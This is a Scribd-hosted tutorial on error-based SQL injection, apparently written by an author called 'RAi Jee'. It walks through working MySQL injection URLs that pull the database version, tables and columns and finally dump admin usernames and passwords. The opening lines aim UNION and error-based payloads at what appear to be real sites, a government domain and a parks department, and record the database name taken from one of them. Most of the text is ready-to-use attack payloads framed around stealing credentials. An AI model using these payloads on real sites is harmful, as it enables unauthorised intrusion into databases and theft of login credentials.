Scribd
Upload
6 views

solution

Uploaded by

Jojo Ventic
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
6 views

solution

Uploaded by

Jojo Ventic
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

http://bpc.gov.bd/contactus.php?id=.4'/*!50000UNION*//*!

50000SELECT*/
1,2,3,4,5,6,7-- -

1. get database
http://www.bransonparksandrecreation.com/page.php?id=12 and (select 1 from (select
count(*),concat((select(select concat(cast(database() as char),0x7e)) from
information_schema.tables where table_schema=database() limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

bransonparks =db
parks

Error Based Injection -Tutorial BY RAi Jee


After Union Based Injection In this Tutorial You Will Learn Error Based SQL
Injection.
How You Will Understand That Our Target WebSite is in Error Based Injection.??
Hmm While we are Injecting Site , And Count Total Number of Columns and Then Build
our Union Based SQL Query .

We got 6 Number of Columns. and our UNION BASED Query.

http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -

When we Execute our Union Based Query it doesn't Give us any Vulnerable Column
Number Printed on The Webpage or in HTML.
It Gives us A Error Message .

The used SELECT statements have a different number of columns

Sometimes The TARGET site not Give Any Vulnerable Column Number And Also Not Any
Kind of Error . Those Sites Are Also Error Based / Double Query SQL injection .
So We Processed Next With Error Based Queries.

1st Step is To Get Version.


Here is The Error Based Query To Get The Version.

http://www.target.com/index.php?id=1 or 1 group by
concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -

and we Will Get The Version Printed on The WebPage.


Error Based Injection -Tutorial

2nd Step is To Get Database Name.

Now Lets Check the Current Database Name.


A Website can Have More than 2 , 3 or 5 Databases. So We Use LIMIT to get all The
Databases.

LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 LIMIT 3,1

Here is Our Query To Get The Database.

http://www.target.com/index.php?id=1 and (select 1 from (select


count(*),concat((select(select concat(cast(database() as char),0x7e)) from
information_schema.tables where table_schema=database() limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

3rd Step Is to Get The Tables .


Now We Have To Get The Tables. As We Want Tables From Primary Database .
Here Is The Query For Tables From Primary Database.
http://www.target.com/index.php?id=1 and (select 1 from (select
count(*),concat((select(select concat(cast(table_name as char),0x7e)) from
information_schema.tables where table_schema=database() limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Increase The Value Of Limit as LIMIT 0,1 to LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
Until You Get Your Desired Table Name .

4th Step Is to Get The Column Names From Our Targeted Table Name.
Now We Have to Get The Column Names From The Table Name.
We Got Table Of Admin.
So Lets Get The Columns From Table Admin .

Here Is The Query For Getting Column Names From The Table Admin.
http://www.target.com/index.php?id=1 and (select 1 from (select
count(*),concat((select(select concat(cast(column_name as char),0x7e)) from
information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x
from information_schema.tables group by x)a)-- -

To Get The Columns From The Table Admin we Have to Encode It In HEX and Then We Can
Execute Our Query.
Here Is that PART in Our Query.

Table_name=ADMIN
Here Is The HEX Value of ADMIN=61646d696e
And Put it With 0x to Build Our Correct Query.

Table_name=0x61646d696e

And Here Is The Query.


http://www.target.com/index.php?id=1 and (select 1 from (select
count(*),concat((select(select concat(cast(column_name as char),0x7e)) from
information_schema.columns where table_name=0x61646d696e limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Increase The Value Of LIMIT to LIMIT 0,1 LIMIT 1,1 LIMIT 2,1
until we Get The Column Name Like Username and Password.

5Th Step Is to Extracting Data From Columns .


After We Get The Column names Like Username And Password.
Next Step Is To Extract Data From These Columns.

Here is The Query For Extracting Data from Columns.


http://www.target.com/index.php?id=1 and (select 1 from (select
count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2)
as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)-- -

WE Put The TABLENAME=Admin


And
Column_name_1=username
Column_name_2=password

So Here is The FINAL QUERY .

http://www.target.com/index.php?id=1 and (select 1 from (select


count(*),concat((select(select concat(cast(concat(username,0x3a,password) as
char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)-- -

And We Get The ADMIN username and Password printed on the Page.

AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee

You might also like